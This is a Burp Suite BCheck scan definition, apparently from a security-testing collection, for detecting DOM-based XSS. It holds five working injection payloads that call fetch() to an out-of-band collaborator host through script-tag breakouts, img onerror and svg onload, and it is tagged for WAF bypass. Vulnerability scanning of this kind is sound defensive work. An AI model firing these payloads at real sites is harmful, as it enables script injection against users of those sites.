metadata:
    language: v2-beta
    name: "XSS - DOM Based Sink Detection"
    description: "Detects DOM XSS by injecting payloads targeting common DOM sinks like innerHTML, document.write, eval"
    author: "BCheck Arsenal"
    tags: "xss", "dom", "waf-bypass"

define:
    collab = {generate_collaborator_address()}

run for each:
    payload = "javascript:fetch('http://{collab}')",
        "'-fetch('http://{collab}')-'",
        "</sCrIpT><sCrIpT>fetch('http://{collab}')</sCrIpT>",
        "<img src=x onerror=fetch('http://{collab}')>",
        "<svg onload=fetch('http://{collab}')>"

given insertion point then
    send payload:
        replacing: {payload}

    if any interactions then
        report issue:
            severity: high
            confidence: certain
            detail: "DOM-based XSS detected. The payload was processed by a client-side sink and successfully executed an out-of-band request."
            remediation: "Avoid dangerous DOM sinks. Use textContent instead of innerHTML. Sanitize all client-side input."
    end if